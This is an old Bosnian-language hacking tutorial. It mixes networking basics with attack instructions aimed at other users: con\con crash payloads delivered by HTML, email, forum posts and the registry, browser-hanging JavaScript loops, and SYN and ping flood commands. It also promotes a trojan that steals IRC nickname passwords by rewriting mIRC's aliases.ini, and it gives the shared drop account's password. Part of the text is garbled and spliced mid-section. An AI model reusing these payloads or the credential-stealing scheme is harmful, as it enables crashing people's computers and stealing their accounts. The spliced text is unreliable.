4.* Razlika izmedju TCP i UDP protocola.
----------------------------------------
Razlika izmedju TCP, i UDP protocola je u tome sto TCP protocol prenosi
podatke dok je veza uspostavljena, a UDP prenosi podatke neuspostavljajuci vezu.
TCP/IP je skupina protokola koja sluzi za komunikaciju medju racunarima.
Sada mozete vidjeti najpoznatije protocole i portove na kojima rade, ovo
su User Services, tj. da korisnik moze koristiti ove servise.
FTP (File Transfver Protocol): prenosi fajlove sa jedne
na drugu masinu. FTP za transver koristi TCP.
TFTP (Trivial File Transfer Protocol): prenosi fajlove
koristeci UDP.
TELNET: omogucuje remote login sto znaci da korisnik moze
da se konektuje na drugu masinu u mrezi i koristi
je kao da sedi za njenom tastaturom.
- Gateway Protocols: ovi servisi pomazu prenos podataka i status
informacija preko lokalnih mreza.
EGP (External Gateway Protocol): prenosi routing
informacije za eksterne mreze.
GGP (Gateway-to-Gateway Protocol): prenosi routing
informacije izmedju internet gateway-a.
IGP (Internal Gateway Protovol): prenosi routing
informacije za interne mreze.
Evo vam primjer za TCP protocole. To je ovaj servis TELNET, jer on prenosi podatke
dok je veza uspostavljena, dok TFTP prenosi fajlove koristeci UDP protocol, tj. kada
veza nije uspostavljena.
* Portovi na kojima protocoli rade:
21 ftp
23 telnet
25 smtp
37 tcp time
70 tcp gopher
79 tcp finger
109 tcp pop-2
110 tcp pop-3
111 tcp sunrpc
113 tcp auth
143 tcp imap
513 tcp login
514 tcp shell
5.* Kako saznat IP adresu?
------------------------------------------
* Komandom Ping mozete doznat IP adresu neke web stranice.
Takodjer, mozete i preko
www.netcraft.com dobiti jos neke
informacije o nekom sajtu.
Primjer:
C:\\\\\\\\>ping
www.nhc-team.org6.* Srusite system komandom: c:\\\\\\\\>CON\\\\\\\\CON
-----------------------------------------
* Sta je Con\\\\\\\\con?
Ovo je bug windows kernel systema tj. bug u upravljanju driverima u IO.SYS,prouzrokuje da se kernel istopi.Pojavi se blue screen i za nekoliko sekundi se komp zakoci.I onda moramo da ga resetujemo.
Kako da iskoristimo con\\\\\\\\con?
Postoji nekoliko nacina da iskoristimo ovaj bug.
Ja sam nabrojao nekoliko.
1.kucamo u command promtu start c:\\\\\\\\con\\\\\\\\con
2.Napravimo web stranicu koja ima sledeci kod:
meta http-equiv="REFRESH" content="3; URL=file:///c:/con/con"
3.posaljemo nekome mail sa kodom koji je prikazan gore.
4.Ako neki win98 system ima Frontpage Webserver mozete srusiti masinu
http://www.a_win98_site.be/con/con5.Jos jedan html tag IMG SRC="c:\\\\\\\\con\\\\\\\\con"
6.Mozete srusiti korisniku komp ako na forumu na kome je html enabled post-ujete poruku tipa
meta http-equiv="REFRESH" content="3; URL=file:///c:/con/con"
7.Ubacivanjem HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\CLASSES\\\\\\\\exefile\\\\\\\\shell\\\\\\\\_
otvoreno sa vrednosti c:\\\\\\\\con\\\\\\\\con c:\\\\\\\\con\\\\\\\\con "%1" %* ce takodje srusiti system.
NETSCAPE ce ako stavite
file:///c:/con/con prebaciti link u
file:///D|/c:\\\\\\\\nul\\\\\\\\nulzato ne stavljajte
file:/// vec samo c:\\\\\\\\con\\\\\\\\con
7.* Otkrivanje uljeza.
-----------------------
* Kako mozete doznati osobu na internetu koja vas je nukkovala, banovala, itd...?
Veoma jednostavno. Dovoljno je da zabiljezite IP adresu tog napadaca.
To je cifra kao npr. 195.222.45.211 Tu adresu svaki korisnik dobije od
svog provajdera dok je on-line, normalno ne istu adresu. E znaci morate
saznat tu IP adresu napadaca. To takodjer mozete saznati ako imate
firewall, jer u nekom log fajlu od firewalla zapisana je ta adresa.
(malo pogledajte fajlove u firewall direktoriju, obicno su sa exstenzijom INI).
E kada ste saznali tu IP adresu, na sajtu:
http://www.ripe.net/db/whois.htmlmozete vidjeti mnogo informacija od tog napadaca, kao sto je provajder itd...
Ako se zelite zaliti tom provajderu kako vas je njihov korisnik uznemiravao, dovoljno je da posaljete mail na support@(neki provajer) npr.
support@bih.net.ba dakle da posaljete mail
sa IP adresom napadaca i uz tacno vrijeme i datum napada. Jer provajder mora imati
tacno vrijeme i datum kako bi saznao koji vas je korisnik uznemiravao.
Evo vamo 2 primjera kako cete to saznat. Ako ste bili na IRC-u sa napadacem,
ustvari ako ste chatali, odnosno ako je vasa scripta snimila log fajl od tog chata,
vi trebate otvorit taj fajl, i pisace vas datum i vrijeme chatanja.
Drugi primjer je ako imate firewall onda u log fajlu koji je firewall zabiljezio,
naci cete te informacije.
8. Hackanje nickname password-a.
--------------------------------
NAPOMENA: Prvo sto trebate jeste da skinete program sa ove adrese:
http://www.freeservers.com/nhc-dokumenti/programi/pass.zip, a zatim procitajte ovo dole!
* Uvod
Program "Password for nickname" napravio je [GARNeT]. Ovaj program sluzi
da "ukrade" nickname password na IRC-u. Dakle, ako zelite da od neke
osobe saznate password od njegovog/njezinog nicka, dovoljno je da ovaj
program "Password for nickname", posaljete toj osobi, i ta osoba treba pokrenut
taj fajl.
* Princip rada alata
Znaci, kada ste poslali ovaj program toj osobi, i kada je ona to pokrenula, onda
code radi svoj zadatak. Kao prvo, ovaj program radi samo na obicnom mIRC-u
i to na svim verzijama. Ako je neka druga scripta, onda nemoze.
Znaci, program radi tako sto ulazi u direktorij mIRC-a, tj u direktorij:
c:/Programs files/mirc, zatim brise fajl Aliases.ini, pravi novi i dodaje
jedan code. I program je uradio svoj posao. Znaci, napravio je novi
fajl aliases.ini u mirc direktoriju. (mIRC mora biti u folderu:
c:/Programs files/mirc, inace program nece raditi). E sada sve sto
treba jeste da osoba udje u mIRC i konektuje se na IRC. Kada ta osoba
izvrsi identifikaciju svog nicka, password od njezinog/njegovog nicka
DOLAZI NA VAS MEMO. (MemoServ je jednostavan servis koji omogucava korisnicima da salju
kratke poruke jedni drugima, pa cak i kad je primalac offline).
E znaci kada je memo sa passwordom stigao, on nije stigao na vas nick,
nego na nick: code-pass, znaci vi se trebate konektovat na IRC pod nickom
code-pass i izvrsiti identifikaciji za nick. Password od ovoga nicka je: code333
I posao je zavrsen. Na taj nick poslije identifiakacije primice te memo poruku,
u kojoj se nalazi password od nicka te osobe od koje ste htjeli saznat password.
I to je to. I jos samo da napomenem da password NIJE kriptovan!
* NAPOMENA
Nickname: code-pass je kao sto vidite neki univerzalni nick, na koji stizu
poruke sa passwordima od nickova. Zato vas molim kada vidite password od
neke osobe tj. kad doje na memo, da lijepo fino promijenite nick u svoj
nick, da nedirate ovaj nick code-pass. Znaci, nemojte mijenjat password ili nesta drugo
od nicka code-pass jer ima osoba koje ce isto uraditi kao i vi. Zato MEMO zna biti
pun poruka sa passwordima
) Ako primjetite da nick: code-pass nemoze te identifikovat,
onda se meni obratite da napravim novo, ili eventulano saznam ko je to uradio (nesto je*o nick)
i naravno da ga kaznim
)
* Ako zelite da imate svoj program koji ce slati samo na vas nickname MEMO poruke
sa passwordima, onda mozete naruciti
)
9.* Nacini kako srusiti(zablokirat)
neciji system pomocu obicne Web stranice
---------------------------------------------
* Pomocu obicne web stranice mozete nekome
srusiti system ili ga natjerati da
mora resetovat masinu.
Evo vam nekoliko HTML kodova:
* 1.Ovaj primjer ce neprestalno otvarati jedan te isti dosadni
prozorcic koji na sebi ima tipku OK i svaki put kad ga ugasite on
se ponovo upali i tako beskonacno.
---------------------------
var x = "never";
function killme() {
while (x == "never") {
alert("-Mi u Boga vjerujemo!-");
}
}
---------------------------
* 2. Ovaj primjer otvara bezbroj puta browser
---------------------------
msIE window bomber
Sistem B : SYN ("Hocu vezu s tobom")
2) Sistem B---->Sistem A : ACK/SYN ("Dobro uzeo sam to uobzir)
3) Sistem A---->Sistem B : ACK ("Dobro,ja se takodjer slazem")
Sad se jednostavno u jednom SYN paketu daje pogresna adresa (jedna koja i nepostoji),
i time ne dolazi na sisitem B- paketa odgovor (ACK), jer i nepostoji adresa.
Ali sistem B ceka jos odredjeno vrijeme na odgovo, sve dok ne dodje "connection timeout".
U tom vremenu se mora sistem B sa sto vise ping-ova prenapuniti. Posljedica je da se
sistem B prenapuni, tako da za odredjeno vrijeme vise ni na jedan SYN-paket odgovori.
* Ping of Death
* Za ovaj napad sluzi obicna komanda koja glasi: "ping adresa -n 9999999"
Kada se posalje ova naredba na odredjeni server, onda on pocinje da obradjuje, ali
posto se poslalo oko milion pingova, onda server sporo obradjuje i jednostavno se
srusi, dolazi do buffer overflow (o ovome imate u tutorialu).
Medjutim za ove napade je davno izasao patch i nevazi na jacim serverima.
(Nemoze te koristit ovaj napad sa slabijim mashinama)
* To bi bilo to, jos samo da napomenen ono sto sam rekao na pocetku a to je da
se veoma tesko zastitit od ovakvih napada. Zato nabavite zastitu da vas lameri
neuznemiravaju bezze
)
15.* Kako na Windowsu iskljuciti MS-DOS prompt?
-----------------------------------------------
* Vrlo jednostavno mozete iskljuciti MS-DOS prompt.
Sve sto trebate jeste da startujete Regedit i otidjite na
lokaciju:
HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\WinOldApp
i dodajte DWORD vrijednost: Disabled i upalite akciju. (dodajte 1)
I to je to, vise nece biti MS-DOS prompt.
Ako ponovo zelite vratiti onda dodjelite vrijedost 0 umjesto 1.
16.* Sta je to HTTP, HTML...?
----------------------
* HTML (HyperText Markup Language)
Programski jezik koji se koristi za stvaranje hipertekstovnih dokumenata (dokumenata koji sadrzavaju linkove) na Webu.
HTTP (HyperText Transfer Protocol)
Protokol koji se koristi za prijenos hipertekstovnih dokumenata, tj. Web stranica.
HTTPS (HyperText Transmission Protocol, Secure)
Protokol koji sluzi za siguran prijenos podataka i Web stranica izmedju korisnikovog Web klijenta i Web servera. Podaci koji se razmjenjuju se kriptiraju, tako da ih neovlasteni korisnici ne mogu procitati. HTTPS protokol se koristi kada je potrebno razmijeniti privatne podatke, kao sto su passwordi kod koristenja raznih Web servisa, brojevi kreditnih kartica kod on-line kupovanja i itd...
17.* Sta je to buffer overflow?
-------------------------------
* Buffer overflow - prekoracenje bafera.
U toku izvrsenja programa u neku od programskih varijabli se unese vrijednost koja
je mnogo veca od ocekivane, prilikom cega dolazi do izvrsenja drugog proizvoljnog koda
obicno sa privilegijama roota ili administratora. Ovo je tezak problem i
jedino rjesenje je instaliranje najnovijih service packova kojima se ove greske
uklanjaju iz programskog koda.
18.* Sta je to backdoor?
-------------------------
* Pod ovim pojmom se podrazumjeva akcija koju haker poduzima na vec
provaljenom systemu. Ako haker dodje do root lozinke, ona mu nece mnogo
pomoci ako su servisi poput telneta iskljuceni. Zbog toga on ostavlja neku
vrstu tajnog prolaza na koji moze uci kada hoce i raditi sta hoce
)
19.* Sta je to "Daljinska kontrola"?
-----------------------------------
* Iako su programi za daljinsku kontrolu korisni, pogresna upotreba moze ih pretvoriti
u mocne alate hakera koji pomocu njih mogu preuzeti totalnu kontrolu nad systemom.
Dovoljno je da ostavite praznu lozinku pa bi neko sa boljim port skenerom mogao
otkriti da se na systemu vrti program za daljinsku kontrolu, te bi se prilikom
logiranja prijatno iznenadio vidjevsi da mu lozinka nije ni potrebna